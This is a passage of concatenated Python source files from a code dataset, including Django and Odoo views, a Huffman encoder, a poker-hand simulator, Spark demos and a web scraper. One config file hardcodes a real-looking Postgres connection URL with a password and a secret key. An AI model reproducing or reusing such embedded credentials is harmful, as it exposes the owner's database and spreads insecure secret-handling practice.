\t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),])\n# \treturn render(request, 'home.html', {'geodata':geodata})\n\n \n\ndef index(request):\n return render(request, 'index.html')\n\n\n\n\n\ndef result(request):\n\tif request.method == \"POST\":\n\t\ttemp={}\n\t\ttemp['Quiz']=request.POST.get('Quiz')\n\t\tprint(temp['Quiz'])\n\t\ttemp['sampletest']=request.POST.get('sampletest')\n\t\ttemp['playing']=request.POST.get('playing')\n\t\ttemp['sleeping']=request.POST.get('sleeping')\n\t\ttemp['learning']=request.POST.get('learning')\n\t\tprint(temp)\n\t\t#headers= {'Content-Type':'application/json'}\n\t\t#read= requests.post('http://127.0.0.1:8000/checkapi/',json=temp,headers=headers)\n\t\t#home(request)\n\t\tdata=pd.read_csv('datagas.csv')\n\t\t#print(data)\n\t\t#quiz= request.POST.get('quiz')\n\t\t#print(quiz)\n\t\t#context= {'quiz': quiz}\n\t\t\n\t \n\t\tdata.head()\n\t\tdata.isnull().sum()\n\t\t#print(data)\n\t\tmapper = DataFrameMapper([(['Quiz','sampletest','playing','sleeping','learning'], preprocessing.StandardScaler())])\n\t\tpipeline_obj = pipeline.Pipeline([('mapper',mapper),(\"model\", ensemble.RandomForestRegressor())])\n\t\t# data.columns\n\t\tX=['Quiz', 'sampletest', 'playing', 'sleeping','learning']\n\t\tY=['Total']\n\t\tpipeline_obj.fit(data[X],data[Y].values.ravel())\n\t\t#print(pipeline_obj.predict(data[X]))\n\t\tjb.dump(pipeline_obj,'RFModelforMPG.pkl')\n\t\tmodelReload=jb.load('RFModelforMPG.pkl')\n\t\t#print(modelReload.predict(data[X]))\n\t\t#sampledata={1:{'quiz':2,'sampletest':10,'sleep':2,'learn':5},2:{'quiz':2,'sampletest':10,'sleep':2,'learn':5},3:{'quiz':2,'sampletest':10,'sleep':2,'learn':5}}\n\n\t\t#print((temp['Quiz']*2)+ (temp['sampletest']*2)+ (temp['sleeping']*2))\n\t\ttestDtaa=pd.DataFrame({'x':temp}).transpose()\n\t\t#print(testDtaa)\n\t\t#print(modelReload.predict(testDtaa)[0])\n\t\treturn render(request, 'result.html',{'quiz':modelReload.predict(testDtaa)[0]})\n\n\n\nclass TestView(APIView):\n\tdef get(self,request,*args,**kwargs):\n\t\tdata=pd.read_csv('datagas.csv')\n\t\tmapper = DataFrameMapper([\n (['Quiz','sampletest','playing','sleeping','learning'], preprocessing.StandardScaler())])\n\t\tpipeline_obj = pipeline.Pipeline([('mapper',mapper),(\"model\", ensemble.RandomForestRegressor())])\n\t\tX=['Quiz', 'sampletest', 'playing', 'sleeping','learning']\n\t\tY=['Total']\n\t\tpipeline_obj.fit(data[X],data[Y].values.ravel())\n\t\tpipeline_obj.predict(data[X])\n\t\tprint(data['id'])\n\t\tprint(dict(zip(data['id'],pipeline_obj.predict(data[X]))))\n\t\t#result(request)\n\t\t#outdata=\"hello python\"\n\t\t#data = {\n\t\t#'name':'vaish',\n\t\t# 'age':25\n\t\t# }\n\t\t\n\t\treturn Response(dict(zip(data['id'],pipeline_obj.predict(data[X]))))\n\n\n\n# class TestView1(APIView):\n# \tdef get(self,request,*args,**kwargs):\n# \t\t#result(request)\n# \t\toutdata=\"hello python\"\n# \t\tdata = {\n# \t\t'name':'vaish',\n# \t\t'age':25\n# \t\t}\n# \t\treturn Response(outdata)\n","sub_path":"application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"550630835","text":"import datetime\n\nfrom odoo import api, models\nfrom odoo.exceptions import UserError\nfrom odoo.tools.translate import _\n\n\nclass CalendarEventFinish(models.TransientModel):\n _inherit = 'calendar.event.finish'\n\n @api.multi\n def action_finish_calendar_event(self):\n \"\"\"Finaliza evento de calendário e cria entrada na planilha\n de horas (account.analytic.line).\n \n Raises:\n UserError -- quando o evento não possui projeto e/ou já esta finalizado.\n \n Returns:\n dict -- dict contendo 'ir.actions.act_window_close'.\n \"\"\"\n\n self.ensure_one()\n res = super(CalendarEventFinish, self).action_finish_calendar_event()\n\n ce = self.calendar_event_id\n\n if ce.project_id and ce.event_state == 'done':\n dt = datetime.datetime.strptime(ce.start_datetime,\n '%Y-%m-%d %H:%M:%S')\n\n partners = [item.id for item in ce.partner_ids\n if item.parent_id == ce.company_partner_id]\n\n users = self.env['res.users'].search([('partner_id', 'in', partners)])\n\n # Create Timesheet to any user in users list\n for user in users:\n values = self._get_account_analytic_line_values(\n user=user, calendar_event=ce, start_datetime=dt)\n\n # Utilizamos sudo a fim de permitir que um usuario\n # crie entradas para outros usuarios\n self.env['account.analytic.line'].sudo().create(values)\n else:\n raise UserError(_(\"To finish this event, it must be in 'Open' \"\n \"state and select a project\"))\n\n return res\n\n @api.multi\n def _get_account_analytic_line_values(self, user, calendar_event, start_datetime):\n \"\"\"Retorna valores para serem usados na criação de uma entrada na planilha\n de dados (account.analytic.line).\n\n Arguments:\n user {res.users} -- Usuario cujo entrada sera atribuida.\n calendar_event {calendar.event} -- Calendar Event para ser usado na entrada.\n start_datetime {datetime} -- objeto datetime com data e hora do evento.\n\n Returns:\n dict -- Dict com valores da account.analytic.entry.\n \"\"\"\n\n self.ensure_one()\n values = {\n 'name': calendar_event.name,\n 'date': start_datetime.date(),\n 'user_id': user.id,\n 'customer_partner_id': calendar_event.customer_partner_id.id,\n 'company_id': calendar_event.user_id.company_id.id,\n 'project_id': calendar_event.project_id.id,\n 'unit_amount': calendar_event.event_duration,\n 'calendar_event_id': calendar_event.id,\n }\n\n if calendar_event.task_id:\n values['task_id'] = calendar_event.task_id.id\n values['project_task_type_id'] = calendar_event.task_id.stage_id.id\n\n return values\n","sub_path":"calendar_event_timesheet/wizards/calendar_event_finish.py","file_name":"calendar_event_finish.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"167045530","text":"import re\r\n\r\ndef correct(query):\r\n \r\n add=\"C:\\\\Users\\\\DELL\\\\Desktop\\\\Project\\\\Bing\\\\paragraph\\\\\"+query+\".txt\"\r\n add1=\"C:\\\\Users\\\\DELL\\\\Desktop\\\\Project\\\\Bing\\\\paragraph1\\\\\"+query+\".txt\"\r\n file = open(add,'r',encoding=\"utf-8\")\r\n file1= open(add1,'a',encoding=\"utf-8\")\r\n i=0\r\n s=\"\"\r\n while(True):\r\n r=file.readline()\r\n s+=r\r\n i+=1\r\n if(i==100 or r==\"\"):\r\n i=0\r\n s=re.sub(\"[\\{(<\\[].*?[\\>)}\\]]\", \"\", s)\r\n file1.write(s)\r\n s=\"\"\r\n #\\{([^()]|())*\\} \r\n if(r==\"\"):\r\n break\r\n \r\ncorrect(\"swine flu vaccine\")\r\n","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"343484730","text":"from math import log2, acos, sqrt, pi\nimport turtle\n\n\nclass ListNew(list):\n @property\n def last_index(self):\n return len(self) - 1\n\n def __gt__(self, other):\n return len(self) > other\n\n\nclass PriorityQueue:\n def __init__(self, items=[]):\n self.contents = ListNew()\n for item in items:\n self.contents.append(item)\n self.heapify_up()\n\n def __bool__(self):\n return bool(self.contents)\n\n @property\n def last(self):\n return self.contents.last_index\n\n def last_element(self):\n return self.contents[self.last]\n\n @staticmethod\n def left_child(i):\n return 2 * i + 1\n\n @staticmethod\n def right_child(i):\n return 2 * i + 2\n\n @staticmethod\n def parent(i):\n return (i - 1)//2\n\n def heapify_up(self):\n new = self.last\n while new >= 1:\n parent = self.parent(new)\n if self.contents[new] < self.contents[parent]:\n self.contents[new], self.contents[parent] = self.contents[parent], self.contents[new]\n new = parent\n else:\n return\n\n def search(self, node):\n return self.contents.index(node)\n\n def insert(self, item):\n self.contents.append(item)\n self.heapify_up()\n\n def delete(self, node=None):\n if node is None:\n root = self.contents[0]\n self.contents[0], self.contents[self.last] = self.contents[self.last], self.contents[0]\n self.contents.pop()\n self.heapify_down()\n return root\n else:\n index = self.search(node)\n self.contents[index], self.contents[self.last] = self.contents[self.last], self.contents[index]\n self.contents.pop()\n self.heapify_down(index)\n\n def heapify_down(self, index=0):\n mini = index\n while index < len(self.contents):\n left = self.left_child(index)\n right = self.right_child(index)\n if left < len(self.contents) and right < len(self.contents):\n if self.contents[right] < self.contents[left]:\n min_child_index = right\n else:\n min_child_index = left\n if self.contents[min_child_index] <= self.contents[index]:\n mini = min_child_index\n elif left < len(self.contents):\n if self.contents[left] <= self.contents[index]:\n mini = left\n if index == mini:\n return\n self.contents[index], self.contents[mini] = self.contents[mini], self.contents[index]\n index = mini\n\n def peek(self):\n return self.contents[0]\n\n\nclass HuffmanTree:\n class Node:\n def __init__(self, value=None, probability=None, l_child=None, r_child=None):\n self.value = value\n self.probability = probability\n self.l_child = l_child\n self.r_child = r_child\n\n def __eq__(self, other):\n return self.probability == other\n\n def __lt__(self, other):\n return self.probability < other\n\n def __le__(self, other):\n return self.probability <= other\n\n def __gt__(self, other):\n return self.probability > other\n\n def __ge__(self, other):\n return self.probability >= other\n\n def __init__(self):\n self.root = None\n\n class HuffmanEncoder:\n @staticmethod\n def get_frequency(text):\n count = {}\n all_sum = 0\n for character in text:\n count[character] = count.get(character, 0) + 1\n all_sum += 1\n # all_sum = sum(count[ch] for ch in count)\n return [(ch, count[ch] / all_sum) for ch in count]\n\n def huffman_coding(self, symbols):\n queue = PriorityQueue()\n for symbol, frequency in symbols:\n queue.insert(self.Node(value=symbol, probability=frequency))\n while queue.contents > 1:\n # for node in queue.contents:\n # print(node.value, node.probability, end=\" \")\n # print()\n node1 = queue.delete()\n node2 = queue.delete()\n parent_node = self.Node(value=None, probability=(node1.probability + node2.probability),\n l_child=node2, r_child=node1)\n queue.insert(parent_node)\n self.root = queue.delete()\n return self.root\n\n def _get_code(self, cur_node, code=\"\", codes_array=[]):\n\n if cur_node is not None:\n if cur_node.value is not None:\n codes_array.append((cur_node.value, code))\n if cur_node.l_child is not None:\n code += \"0\"\n self._get_code(cur_node.l_child, code, codes_array)\n code = code[:-1]\n if cur_node.r_child is not None:\n code += \"1\"\n self._get_code(cur_node.r_child, code, codes_array)\n return codes_array\n\n def get_codes(self):\n if self.root is not None:\n return sorted(self._get_code(self.root), key=lambda pair: pair[0])\n\n @staticmethod\n def entropy(symbols):\n return -sum(probability * log2(probability) for symbol, probability in symbols)\n\n @staticmethod\n def average_len(codes, symbols):\n return sum(probability[1] * len(symbol[1]) for symbol, probability in zip(codes, symbols))\n\n def _draw(self, cur_node, pen, origin, floors):\n if cur_node is not None:\n pen.penup()\n pen.setposition(origin)\n pen.pendown()\n if cur_node.value is not None:\n pen.write(cur_node.value)\n else:\n pen.write(\"{:0.2f}\".format(cur_node.probability))\n node_dist = 32\n distance = node_dist * sqrt((1 + ((2 ** abs(floors) * 13) ** 2)/(5*node_dist**2)))\n # distance = sqrt(42*log2(abs(floors**2))/(0.34*5))\n angle = 180/pi * acos(node_dist/distance)\n if cur_node.l_child is not None:\n pen.setposition(origin)\n # turtle.pendown()\n pen.right(angle)\n pen.forward(distance)\n left = pen.position()\n pen.left(angle)\n if cur_node.l_child is not None:\n self._draw(cur_node.l_child, pen, left, floors - 0.85)\n if cur_node.r_child is not None:\n pen.penup()\n pen.setposition(origin)\n pen.pendown()\n pen.left(angle)\n pen.forward(distance)\n right = pen.position()\n pen.right(angle)\n if cur_node.r_child is not None:\n self._draw(cur_node.r_child, pen, right, floors - 0.85)\n\n def draw(self, alphabet):\n if self.root is not None:\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(1)\n pen.setheading(-90)\n pen.penup()\n pen.goto(0, 260)\n pen.pendown()\n turtle.Screen().screensize(900, 900)\n self._draw(self.root, pen, pen.position(), sqrt(len(alphabet)))\n\n def encode(self, text):\n freq = self.HuffmanEncoder.get_frequency(text)\n\n # print(freq)\n self.huffman_coding(freq)\n codes = self.get_codes()\n # print(max(len(code[1]) for code in codes))\n # print(codes)\n # print(HuffmanTree.average_len(codes, freq))\n encoded_string = self._encode(text, codes)\n return encoded_string\n\n def _encode(self, text, codes):\n encoded_string = \"\"\n dic = {code[0]: code[1] for code in codes}\n for ch in text:\n if ch in dic:\n encoded_string += dic[ch]\n return encoded_string\n\n def decode(self, encoded_string):\n codes = self.get_codes()\n decoded_string = \"\"\n dic = {code[1]: code[0] for code in codes}\n buffer = \"\"\n for ch in encoded_string:\n buffer += ch\n if buffer in dic:\n decoded_string += dic[buffer]\n buffer = \"\"\n return decoded_string\n\n\ndef main():\n with open(\"alice29.txt\", 'r') as input_f:\n data = input_f.read()\n data.rstrip()\n huf_tree = HuffmanTree()\n text = data\n encoded = huf_tree.encode(text)\n print(len(text) * 4)\n print(len(encoded))\n decoded = huf_tree.decode(encoded)\n print(decoded == data)\n # source = [(\"a_1\", 0.25), (\"a_2\", 0.25), (\"a_3\", 0.125), (\"a_4\", 0.125),\n # (\"a_5\", 0.125), (\"a_6\", 0.0625), (\"a_7\", 0.0625)]\n\n # source = [(\"а\", 0.064), (\"б\", 0.015), (\"в\", 0.039), (\"г\", 0.014),\n # (\"д\", 0.026), (\"е ё \", 0.074), (\"ж\", 0.008),\n # (\"з\", 0.015), (\"и\", 0.064), (\"й\", 0.010), (\"к\", 0.029),\n # (\"л\", 0.036), (\"м\", 0.026), (\"н\", 0.056),\n # (\"о\", 0.096), (\"п\", 0.024), (\"р\", 0.041), (\"с\", 0.047),\n # (\"т\", 0.056), (\"у \", 0.021), (\"ф\", 0.020), (\"х\", 0.009),\n # (\"ц\", 0.004), (\"ч\", 0.013), (\"ш\", 0.006), (\"щ \", 0.003),\n # (\"ъ ь\", 0.015), (\"ы\", 0.016), (\"э \", 0.003), (\"ю\", 0.007), (\"я\", 0.019), (\"-\", 0.124)]\n\n # source = [(\"a_1\", 0.4), (\"a_2\", 0.15), (\"a_3\", 0.15), (\"a_4\", 0.15), (\"a_5\", 0.15)]\n\n # huf.huffman_coding([(\"a_1\", 0.4), (\"a_2\", 0.15), (\"a_3\", 0.15), (\"a_4\", 0.15), (\"a_5\", 0.15)])\n # print(huf.entropy([(\"a_1\", 0.4), (\"a_2\", 0.15), (\"a_3\", 0.15), (\"a_4\", 0.15), (\"a_5\", 0.15)]))\n # huf.huffman_coding(source)\n # print(\"entropy is \" + str(HuffmanTree.entropy(source)) + \" bits\")\n # array_of_codes = huf.get_codes()\n # print(HuffmanTree.average_len(array_of_codes, source))\n # print(\"array of codes:\", array_of_codes)\n # huf.draw(source)\n # turtle.done()\n\n\nmain()\n","sub_path":"Huffman.py","file_name":"Huffman.py","file_ext":"py","file_size_in_byte":9902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"317023200","text":"from django.shortcuts import render, HttpResponse\nfrom firstapp.models import Article\nimport MySQLdb\n# from django.template import Context, Template\n# Create your views here.\n\n\ndef index(request):\n coon = MySQLdb.connect(\n host='localhost',\n port=3306,\n user='root',\n password='123456',\n db='django4',\n charset='utf8'\n )\n\n cursor = coon.cursor()\n cursor.execute('select * from firstapp_article')\n # count = cursor.execute('select * from firstapp_article')\n # print(count)\n results = cursor.fetchall()\n # print(results)\n article_list = []\n for result in results:\n article_list.append(\n {\n 'title': result[1],\n 'content': result[2]\n }\n )\n # print(article_list)\n context = {}\n context['article_list'] = article_list\n return render(request, 'first_web_2.html', context)\n","sub_path":"Level4Code/lesson4firstDjango/LessonCode/root/firstsite/firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"636876599","text":"import os\nPROPAGATE_EXCEPTIONS = True\nHOST = os.environ.get(\"HOST\",\"localhost\")\nPORT = int(os.environ.get('PORT', 5000))\nSQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL', 'mysql://root:admin@localhost/metablog')\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nDATABASE_URL = 'postgres://hkbpscejzgkloi:Ie1vb9I9w26EEVWzhLAmSpFTt6@ec2-107-21-101-67.compute-1.amazonaws.com:5432/dbeopj0ffollee'\n\nWTF_CSRF_ENABLED = True\nSECRET_KEY = '7shenron@!'\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"501795323","text":"from pyspark import SparkContext\n\nsc = SparkContext(appName=\"demo03\")\n\nbooks = sc.textFile(\"/home/spark/hadoop-2.7.3/LICENSE.txt\")\n\n\ndef parse_book(line):\n try:\n words = line.split(\",\")\n return (words[3], float(words[4]))\n except:\n return ()\n\n\nresults1 = books.map(parse_book)\\\n .filter(lambda sp: len(sp) > 0)\\\n .reduceByKey(lambda acc,price: acc + price)\\\n .collect()\n\nprint(results1)\n\n\nresults2 = books.map(parse_book)\\\n .filter(lambda sp: len(sp) > 0)\\\n .aggregateByKey(0, lambda x,y: x+y, lambda x,y: x+y)\\\n .collect()\n\nprint(results2)\n\nsc.stop()\n","sub_path":"spark/pyspark/rdd/demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"262010280","text":"#coding=utf-8\nimport urllib2\nimport urllib\nimport sys\nimport json\nfrom bs4 import BeautifulSoup\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nurl = 'https://www.douyu.com/directory'\n\ndef GetDirectory():\n response = urllib2.urlopen(url)\n content = response.read()\n list_href = []\n list_name = []\n soup = BeautifulSoup(content, \"html.parser\")\n for h in soup.find_all('a','thumb'):\n list_href.append(h.get('href'))\n list_name.append(h.find('p').string)\n\n dic = dict(zip(list_name,list_href))\n return dic\n\n #print soup.prettify()\n\ndef GetFirstPage(directory):\n douyu = \"https://www.douyu.com\"\n for item in directory.itervalues():\n u = douyu + item\n responses = urllib2.urlopen(u)\n contents = responses.read()\n soups = BeautifulSoup(contents,\"html.parser\")\n listName = []\n listNum = []\n for p in soups.find_all(\"div\",\"mes\"):\n listName.append(p.find('h3').string)\n listNum.append(p.find(\"span\",\"dy-num fr\").string)\n #dic = dict(zip(listName,listNum))\n with open(\"E:\\douyu.txt\",'a') as f:\n f.write(str(listName))\n f.close()\n #print json.dumps(dic,ensure_ascii=False, encoding='UTF-8')\n\n\nif __name__ == '__main__':\n directory = GetDirectory()\n GetFirstPage(directory)\n","sub_path":"douyu.py","file_name":"douyu.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"261381320","text":"from fints2ledger.transaction_retriever import TRetriever\nfrom fints.client import FinTS3PinTanClient\nfrom fints2ledger.csv_converter import CsvConverter\nfrom mt940.models import Date\n\n\nclass Fints2Csv:\n def __init__(self, config):\n self.config = config\n\n def retrieveAndSave(self):\n client = FinTS3PinTanClient(\n self.config[\"fints\"][\"blz\"], # Your bank's BLZ\n self.config[\"fints\"][\"account\"], # your account number\n self.config[\"fints\"][\"password\"],\n # e.g. 'https://fints.ing-diba.de/fints/'\n self.config[\"fints\"][\"endpoint\"]\n )\n\n retriever = TRetriever(client, self.config[\"fints\"][\"account\"])\n converter = CsvConverter(self.config[\"fints\"][\"csv_separator\"])\n\n csv_output = \"\\n\".join(map(lambda transaction: converter.convert(\n transaction), retriever.get_hbci_transactions(self.config[\"fints\"][\"start\"], Date.today())))\n\n with open(self.config[\"files\"][\"csv_file\"], 'w') as f:\n f.write(converter.get_headline())\n f.write(\"\\n\")\n f.write(csv_output)\n","sub_path":"fints2ledger/fints2csv.py","file_name":"fints2csv.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"554380985","text":"import random\nimport collections\n\nPALOS = ['Espadas', 'Corazones', 'Diamantes', 'Treboles']\nVALORES = ['As', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']\n\ndef crear_baraja():\n barajas = []\n for palo in PALOS:\n\n for valor in VALORES:\n barajas.append((palo, valor))\n \n return barajas\n\n\ndef obtener_mano(barajas, tamano_mano):\n return random.sample(barajas, tamano_mano)\n \n\ndef coincidencias(mano, tamano_coincidencia):\n num_coincidencias = 0\n valores = []\n for carta in mano:\n valores.append(carta[1])\n counter = dict(collections.Counter(valores))\n for i in counter.values():\n if i == tamano_coincidencia:\n num_coincidencias += 1\n return num_coincidencias\n\n\ndef escalera(mano):\n valores = []\n for carta in mano:\n valores.append(carta[1])\n for i, val in enumerate(valores):\n if val == 'As':\n valores[i] = 1\n elif val == 'J':\n valores[i] = 11\n elif val == 'Q':\n valores[i] = 12\n elif val == 'K':\n valores[i] = 13\n else:\n valores[i] = int(val)\n \n valores = sorted(valores)\n escalera = True\n for i in range(len(valores)-1):\n if i == 0:\n if valores[0]==1 and valores[len(valores)-1]==13:\n pass\n elif valores[i]+1 != valores[i+1]:\n escalera = False\n break\n\n return escalera\n\n\ndef color(mano):\n palos = []\n for carta in mano:\n palos.append(carta[0])\n coincidencia = True\n for i in range(len(palos)-1):\n if palos[i] != palos[i+1]:\n coincidencia = False\n\n return coincidencia\n \n\ndef probabilidad_pares(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 2):\n contar += 1\n return contar/intentos\n \n\ndef probabilidad_un_par(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 2)==1:\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_dos_pares(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 2)==2:\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_trio(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 3):\n contar += 1\n return contar/intentos\n\ndef probabilidad_escalera(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if escalera(mano):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_color(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if color(mano):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_full(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 2) and coincidencias(mano, 3):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_poker(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if coincidencias(mano, 4):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_escalera_color(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n if escalera(mano) and color(mano):\n contar += 1\n return contar/intentos\n\n\ndef probabilidad_escalera_real(intentos, barajas, tamano_mano):\n contar = 0\n for _ in range(intentos):\n mano = obtener_mano(barajas, tamano_mano)\n real = False\n for i, j in mano:\n if j == 'A':\n real = True\n if escalera(mano) and color(mano) and real:\n contar += 1\n return contar/intentos\n\n\nif __name__ == \"__main__\":\n barajas = crear_baraja()\n tamano_mano = int(input('Cuántas cartas quieres: '))\n intentos = int(input('Cuántas veces quieres simular: '))\n print(f'Probabilidad de Pares: {probabilidad_pares(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Un Par: {probabilidad_un_par(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Dos Pares: {probabilidad_dos_pares(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Trio: {probabilidad_trio(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Escalera: {probabilidad_escalera(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Color: {probabilidad_color(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Full House: {probabilidad_full(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Poker: {probabilidad_poker(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Escalera de Color: {probabilidad_escalera_color(intentos, barajas, tamano_mano)}')\n print(f'Probabilidad de Flor Imperial: {probabilidad_escalera_real(intentos, barajas, tamano_mano)}')","sub_path":"Estadistica_computacional/decks.py","file_name":"decks.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"339109475","text":"from django.shortcuts import render,HttpResponse\nfrom django.http import Http404\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom data.models import UnemploymentByStateMonthly, UsState, NatalityByStateYearly, MortalityByStateYearly\nfrom forms import UsStateSelectForm, kmeansNumSamplesForm, YearlyMapAggregationForm\nfrom django.template import RequestContext\nfrom django.db.models import Avg, Max, Min, Sum\nimport numpy\nimport json as simplejson\n# Import Michael's implementation for kmeans\nimport kmeans\ndef index(request):\n\treturn render_to_response('visualization/index.html', {\n\t\t}, context_instance=RequestContext(request))\n\n\ndef timeseries_unemployment(request):\n\tstate=None\n\tdata = None\n\tform = UsStateSelectForm()\n\tif request.method == 'POST':\n\t\tform = UsStateSelectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tstates = form.cleaned_data['name']\n\t\t\tstates_id = [ int(state.id) for state in states ]\n\t\t\tdata = UnemploymentByStateMonthly.objects.filter(state__id__in = states_id ).order_by('state','year','month')\n\t\n\treturn render_to_response('visualization/linechart.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'state': state,\n\t\t'title': 'Unemployment (monthly)',\n\t\t'subtitle': '',\n\t\t'y_axis': '%s of state population' % '%',\n\t\t}, context_instance=RequestContext(request))\n\ndef timeseries_natality(request,variable='num_births'):\n\tstate=None\n\tdata = None\n\tform = UsStateSelectForm()\n\ttitle=yaxis=None\n\tif request.method == 'POST':\n\t\tform = UsStateSelectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tstates = form.cleaned_data['name']\n\t\t\tstates_id = [ int(state.id) for state in states ]\n\n\t\t\tif (len(states_id)>0):\n\t\t\t\t# Aggregate by state and year\n\t\t\t\tif variable in ('num_births','birth_rate','fertility_rate'):\n\t\t\t\t\tdata = NatalityByStateYearly.objects.filter(state__id__in= states_id).values('state','year').select_related('state__name').annotate(value=Sum(variable))\n\t\t\t\t\tif variable=='num_births':\n\t\t\t\t\t\tdata = data.filter(num_births__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\ttitle = 'Number of Births (yearly)'\n\t\t\t\t\t\tyaxis='births'\n\t\t\t\t\telif variable=='birth_rate':\n\t\t\t\t\t\tdata = data.filter(birth_rate__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\ttitle = 'Births rate (yearly)'\n\t\t\t\t\t\tyaxis='birth rate (per 1000)'\n\t\t\t\t\telif variable=='fertility_rate':\n\t\t\t\t\t\ttitle = 'Fertility rate (yearly)' \n\t\t\t\t\t\tyaxis='fertility rate (per 1000)'\n\t\t\t\t\t\tdata = data.filter(fertility_rate__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\telse:\n\t\t\t\t\traise Http404\n\t\t\telse:\n\t\t\t\tdata = None\n\t\t\t\n\t\n\treturn render_to_response('visualization/linechart.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'state': state,\n\t\t'title': title,\n\t\t'subtitle': '',\n\t\t'yaxis':yaxis\n\t\t}, context_instance=RequestContext(request))\n\n\ndef timeseries_mortality(request,variable='num_deaths'):\n\tstate=None\n\tdata = None\n\tform = UsStateSelectForm()\n\ttitle=yaxis=None\n\tif request.method == 'POST':\n\t\tform = UsStateSelectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tstates = form.cleaned_data['name']\n\t\t\tstates_id = [ int(state.id) for state in states ]\n\t\t\tif (len(states_id)>0):\n\t\t\t\t# Aggregate by state and year\n\t\t\t\tif variable in ('num_deaths','crude_rate'):\n\t\t\t\t\tdata = MortalityByStateYearly.objects.filter(state__id__in= states_id).values('state','year').select_related('state__name').annotate(value=Sum(variable))\n\t\t\t\t\tif variable=='num_deaths':\n\t\t\t\t\t\tdata = data.filter(num_deaths__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\ttitle = 'Number of Deaths (yearly)'\n\t\t\t\t\t\tyaxis='Deaths'\n\t\t\t\t\telif variable=='crude_rate':\n\t\t\t\t\t\tdata = data.filter(crude_rate__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\ttitle = 'Crude rate (yearly)'\n\t\t\t\t\t\tyaxis='Crude rate (per 1000)'\n\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\traise Http404\n\t\t\telse:\n\t\t\t\tdata = None\n\t\t\t\n\t\n\treturn render_to_response('visualization/linechart.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'state': state,\n\t\t'title': title,\n\t\t'subtitle': '',\n\t\t'yaxis':yaxis\n\t\t}, context_instance=RequestContext(request))\n\ndef association_mortality(request):\n\tstate=None\n\tdata = 